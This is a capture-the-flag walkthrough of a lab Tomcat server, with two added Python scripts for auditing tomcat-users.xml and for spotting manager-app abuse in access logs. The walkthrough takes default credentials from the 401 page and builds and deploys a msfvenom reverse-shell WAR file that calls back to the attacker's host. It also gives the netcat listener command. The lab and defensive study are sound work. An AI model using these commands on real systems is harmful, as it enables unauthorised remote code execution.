Here we go again, the usual initial nmap scan to kick things off:
nmap -Pn -sS 10.10.10.95 -v
Follow this up with another nmap scan delving a bit deeper into TCP 8080:
nmap -sVC -p8080 10.10.10.95 -v
Let’s head to the web browser and see what we can find there.
We find a default installation of Apache Tomcat. Clicking the “Manager App” button might yield favorable results 😉
We’re prompted with a login box asking us for credentials. With the benefit of hindsight, hitting “Esc” here brings us to a 401 Error page as follows:
Here we can find some credentials which should help further our cause. Head back to the homepage and try the “/manager/html” page again, this time with the new credentials.
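The lesson from the 401 page is that the manager application is only as safe as the accounts in tomcat-users.xml. Below is a small audit script, added here as an example and not part of the original write-up, that parses a constructed tomcat-users.xml and reports every account holding a manager or host-manager role together with the weaknesses a defender would want flagged (empty password, password equal to the username, short password, and manager-gui combined with manager-script, which the Tomcat documentation advises against). The sample file contents and the role set are assumptions for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml for illustration only (not taken from the target).
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="deploy" password="deploy" roles="manager-gui,manager-script"/>
  <user username="ops" password="" roles="manager-gui"/>
  <user username="reporting" password="Vq7#rL2pX9!zb" roles="reporting"/>
</tomcat-users>
"""

# Roles that grant control over deployed applications (assumed list based on the
# roles Tomcat ships with for the manager and host-manager webapps).
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}


def local_name(tag):
    """Strip the XML namespace prefix, e.g. '{http://...}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text, min_length=12):
    """Return a finding per account that holds a privileged role.

    Each finding lists the privileged roles and the issues detected for that account.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if local_name(elem.tag) != "user":
            continue
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if not privileged:
            continue  # ordinary application role, not in scope for this audit
        issues = []
        if password == "":
            issues.append("empty_password")
        elif password.lower() == name.lower():
            issues.append("password_equals_username")
        elif len(password) < min_length:
            issues.append("short_password")
        if {"manager-gui", "manager-script"} <= privileged:
            # Tomcat recommends separate accounts for the HTML and scripting interfaces.
            issues.append("gui_and_script_roles_combined")
        findings.append({"user": name, "roles": sorted(privileged), "issues": issues})
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```

Run it against a real tomcat-users.xml by reading the file into a string and passing it to audit_tomcat_users; any account that appears in the output with a non-empty issues list is one the manager login box would accept with a guessable credential.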
Now that we have got access to the Web App Manager portal, we notice a “WAR file to deploy” section. Let’s create a reverse shell using msfvenom and output the result as a .war file.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=1337 -f war > rev.war
With the reverse shell generated, let’s try to upload it using the portal.
And hey presto, we appear to have successfully uploaded the “rev.war” shell!
Start a netcat listener on the port used in the msfvenom command above (nc -lnvp 1337), and click the “/rev” link on the Tomcat portal.
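From the blue-team side, the whole sequence above (a 401 on the manager page, a successful manager login shortly after, a WAR upload, then the first request to a context that was never part of the server’s known deployments) is visible in Tomcat’s access log. The script below is an added example, not part of the original write-up, that runs three such checks over a few constructed access-log lines in the AccessLogValve “common” format. The sample lines, the list of known contexts and the ten-minute correlation window are assumptions chosen for the illustration.

```python
import re
from datetime import datetime

# Constructed Tomcat access-log sample (AccessLogValve "common" pattern). The addresses,
# timestamps and the "/rev" context are made up for this example, not from the target.
SAMPLE_LOG = """\
10.10.16.3 - - [29/Jun/2018:10:21:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.3 - tomcat [29/Jun/2018:10:21:20 +0000] "GET /manager/html HTTP/1.1" 200 11780
10.10.16.3 - tomcat [29/Jun/2018:10:22:05 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=4F1A HTTP/1.1" 200 12310
10.10.16.3 - - [29/Jun/2018:10:22:30 +0000] "GET /rev/ HTTP/1.1" 200 -
10.10.14.7 - - [29/Jun/2018:10:25:00 +0000] "GET /docs/ HTTP/1.1" 200 4521
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Contexts an operator expects on this server (assumed inventory for the example).
KNOWN_CONTEXTS = {"", "ROOT", "manager", "host-manager", "docs", "examples"}

# Manager endpoints that deploy a WAR (HTML form upload and the text interface).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")


def parse_line(line):
    """Parse one common-format access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def detect(log_text, window_seconds=600):
    """Return (rule, host, detail) alerts for manager abuse patterns in the log."""
    alerts = []
    last_401 = {}  # host -> time of its most recent 401 on the manager app
    deploys = []   # times at which a WAR deploy succeeded
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        path = ev["path"].split("?", 1)[0]
        host, ts = ev["host"], ev["ts"]

        # Rule 1: a manager login that succeeds shortly after a 401 from the same host.
        if path.startswith("/manager/"):
            if ev["status"] == 401:
                last_401[host] = ts
            elif ev["status"] == 200 and host in last_401 \
                    and (ts - last_401[host]).total_seconds() <= window_seconds:
                alerts.append(("manager_login_after_401", host, ev["user"]))
                del last_401[host]

        # Rule 2: any WAR deployment through the manager app.
        if ev["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PATHS):
            deploys.append(ts)
            alerts.append(("war_deploy", host, ev["user"]))
            continue

        # Rule 3: first hit on a context outside the inventory, soon after a deploy.
        context = path.strip("/").split("/", 1)[0]
        if context not in KNOWN_CONTEXTS and \
                any((ts - t).total_seconds() <= window_seconds for t in deploys):
            alerts.append(("new_context_hit", host, "/" + context))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The three rules are deliberately independent so that each one still fires on its own: a WAR deploy by a legitimate administrator is worth a ticket even without a preceding 401, and a request to an unknown context after a deploy is the signal that something uploaded through the manager is now being executed.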
Straight away we notice that we’ve landed as the “NT AUTHORITY\SYSTEM” user.
Post-Exploitation & Loot
Running net user to check for other user accounts suggests that the Administrator account is the only one on this target. Let’s head over to the Administrator Desktop to go lootin’.
We can see a directory labeled “flags”, inside which there are two text documents.
Checking the contents of the “lol.txt” file leads us to the loot.